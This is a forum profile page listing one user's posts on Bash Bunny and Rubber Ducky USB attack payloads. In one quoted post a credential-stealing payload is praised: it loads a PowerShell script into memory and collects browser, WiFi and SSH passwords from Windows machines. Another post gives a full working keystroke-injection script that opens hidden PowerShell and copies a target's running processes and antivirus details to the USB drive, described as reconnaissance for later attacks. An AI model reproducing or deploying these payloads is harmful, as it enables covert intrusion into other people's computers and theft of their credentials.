Jump to content

Decoy

Active Members
  • Posts

    248
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by Decoy

  1. 51 minutes ago, illwill said:

    Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%

    https://github.com/xillwillx/BashBunny/tree/master/JackRabbit

     

    tested on Win 7/8/10 may need to change some Delay timings and IE/Edge cred dump not working in 7

    You are just cranking out payloads. I've tested this on a Windows 10 Machine and it works pretty well so far. Great payload, Sir.

  2. I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.

  3. 6 hours ago, Dave-ee Jones said:

    Simple but effective.

    Utilising simple powershell commands and functions is definitely one of the best things about Ducky script...

    Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn,  and extremely effective.

  4. This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info:

    Name                       : avpui
    Id                         : 724
    PriorityClass              : Normal
    FileVersion                : 17.0.0.643
    Path                       : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
    Company                    : AO Kaspersky Lab
    CPU                        : 85.875
    ProductVersion             : 17.0.0.643
    Description                : Kaspersky Anti-Virus
    Product                    : Kaspersky Anti-Virus

    https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo

    #!/bin/bash
    #
    # Title:         Process Info
    # Author:        Decoy
    # Version:       1.0
    # Category:      Recon
    # Target:        Windows XP SP3+ (Powershell)
    # Attackmodes:   HID, Storage
    # 
    # 
    # Amber Blink Fast.....Initialization
    # Amber................Begin
    # White Blinking... ...Moving loot to mass storage
    # Blue Blinking........Syncing File System
    # Green................Finished
    
    # Initialization
    LED R G 100
    
    # Create loot directory
    mkdir -p /root/udisk/loot/ProcessInfo
    
    # Runs minimized powershell gathering process information for potential future attack vectors
    LED R G
    ATTACKMODE HID STORAGE
    QUACK DELAY 6000
    QUACK GUI r
    QUACK STRING "powershell -NoP -NonI -W Hidden"
    QUACK ENTER
    QUCK DELAY 1000
    QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
    QUACK ENTER
    LED R G B 100
    sleep 1
    
    # Sync File System
    LED B 100
    sync; sleep 1; sync
    
    # Trap is clean
    LED G

     

  5. 1 hour ago, Scott2906 said:

    i dont know if you know this but is it possible to flash the ducky with the firmware so its a twinduck and just to save the .xml file on the ducky ? 

    Yes you can. You might be better off using PowerShell for it, but you'd just navigate to the ducky directory prior to running netsh.

×
×
  • Create New...